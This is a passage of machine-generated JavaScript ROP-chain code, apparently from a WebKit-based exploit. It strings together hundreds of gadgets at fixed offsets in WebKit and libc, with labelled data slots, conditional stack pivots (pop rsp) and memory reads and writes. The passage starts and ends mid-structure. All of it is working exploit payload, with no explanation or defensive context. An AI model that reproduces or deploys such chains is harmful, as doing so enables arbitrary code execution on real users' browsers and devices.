set_gadget(webkit_base+3236123,); //pop r9
//L7626:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7627:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7628:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+370128, //L7629
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+370144, //L7630
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7629:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7630:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+370240, //L7632
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+370224, //L7631
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7631:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7632:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+370320, //L7633
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7633:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7634:
db([108, 0]); // 0x6c
set_gadget(libc_base+144605,); //pop rdi
//L7635:
db([108, 0]); // 0x6c
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+370464, //L7636
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+370496, //L7638
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+370480, //L7637
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7636:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7637:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7638:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+370664, //L7640
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+370680, //L7641
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+370648, //L7639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7639:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7640:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7641:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+370792, //L7643
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+370840, //L7646
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+370808, //L7644
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7643:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7644:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7645:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7646:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+370952, //L7647+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+370944, //L7647
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L7647:
db([0, 0]); // 0x0
set_gadgets([
ropchain+370968, //L7647+24
ropchain+370984, //L7642
libc_base+782311, //pop rsp
ropchain+376152, //L7648
//L7642:
libc_base+764760, //pop rsi
ropchain+371024, //L7649
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7649:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7651:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+371144, //L7654
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+371128, //L7652
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7652:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7654:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+371320, //L7657
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+371336, //L7658
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+371288, //L7655
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+371304, //L7656
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7655:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7656:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7657:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7658:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+371416, //L7659
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+371432, //L7660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7659:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7660:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+371528, //L7662
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+371512, //L7661
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7661:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7662:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+371608, //L7663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7663:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7664:
db([104, 0]); // 0x68
set_gadget(libc_base+144605,); //pop rdi
//L7665:
db([104, 0]); // 0x68
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+371752, //L7666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+371784, //L7668
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+371768, //L7667
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7666:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7667:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7668:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+371952, //L7670
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+371968, //L7671
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+371936, //L7669
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7669:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7670:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7671:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+372080, //L7673
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+372128, //L7676
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+372096, //L7674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7673:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7674:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7675:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7676:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+372240, //L7677+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+372232, //L7677
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L7677:
db([0, 0]); // 0x0
set_gadgets([
ropchain+372256, //L7677+24
ropchain+372272, //L7672
libc_base+782311, //pop rsp
ropchain+381368, //L7678
//L7672:
libc_base+764760, //pop rsi
ropchain+372312, //L7679
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7679:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7681:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+372432, //L7684
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+372416, //L7682
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7682:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7684:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+372608, //L7687
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+372624, //L7688
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+372576, //L7685
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+372592, //L7686
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7685:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7686:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7687:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7688:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+372704, //L7689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+372720, //L7690
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7689:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7690:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+372816, //L7692
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+372800, //L7691
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7691:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7692:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+372896, //L7693
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7693:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7694:
db([116, 0]); // 0x74
set_gadget(libc_base+144605,); //pop rdi
//L7695:
db([116, 0]); // 0x74
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+373040, //L7696
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+373072, //L7698
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+373056, //L7697
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7696:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7697:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7698:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+373240, //L7700
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+373256, //L7701
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+373224, //L7699
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7699:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7700:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7701:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+373368, //L7703
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+373416, //L7706
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+373384, //L7704
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7703:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7704:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7705:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7706:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+373528, //L7707+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+373520, //L7707
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L7707:
db([0, 0]); // 0x0
set_gadgets([
ropchain+373544, //L7707+24
ropchain+373560, //L7702
libc_base+782311, //pop rsp
ropchain+386584, //L7708
//L7702:
libc_base+764760, //pop rsi
ropchain+373600, //L7709
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7709:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7711:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+373720, //L7714
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+373704, //L7712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7712:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7714:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+373896, //L7717
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+373912, //L7718
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+373864, //L7715
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+373880, //L7716
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7715:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7716:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7717:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7718:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+373992, //L7719
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+374008, //L7720
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7719:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7720:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+374104, //L7722
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+374088, //L7721
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7721:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7722:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+374184, //L7723
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7723:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7724:
db([106, 0]); // 0x6a
set_gadget(libc_base+144605,); //pop rdi
//L7725:
db([106, 0]); // 0x6a
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+374328, //L7726
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+374360, //L7728
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+374344, //L7727
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7726:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7727:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7728:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+374528, //L7730
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+374544, //L7731
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+374512, //L7729
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7729:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7730:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7731:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+374656, //L7733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+374704, //L7736
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+374672, //L7734
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7733:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7734:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7735:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7736:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+374816, //L7737+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+374808, //L7737
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L7737:
db([0, 0]); // 0x0
set_gadgets([
ropchain+374832, //L7737+24
ropchain+374848, //L7732
libc_base+782311, //pop rsp
ropchain+388752, //L7738
//L7732:
libc_base+764760, //pop rsi
ropchain+374888, //L7739
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7739:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7741:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+375008, //L7744
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+374992, //L7742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7742:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7744:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+375184, //L7747
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+375200, //L7748
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+375152, //L7745
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+375168, //L7746
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7745:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7746:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7747:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7748:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+375280, //L7749
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+375296, //L7750
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7749:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7750:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+375392, //L7752
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+375376, //L7751
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7751:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7752:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+375472, //L7753
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7753:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7754:
db([122, 0]); // 0x7a
set_gadget(libc_base+144605,); //pop rdi
//L7755:
db([122, 0]); // 0x7a
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+375616, //L7756
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+375648, //L7758
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+375632, //L7757
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7756:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7757:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7758:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+375816, //L7760
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+375832, //L7761
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+375800, //L7759
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7759:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7760:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7761:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+375944, //L7763
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+375992, //L7766
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+375960, //L7764
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7763:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7764:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7765:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7766:
db([0, 0]); // 0x0
set_gadgets([
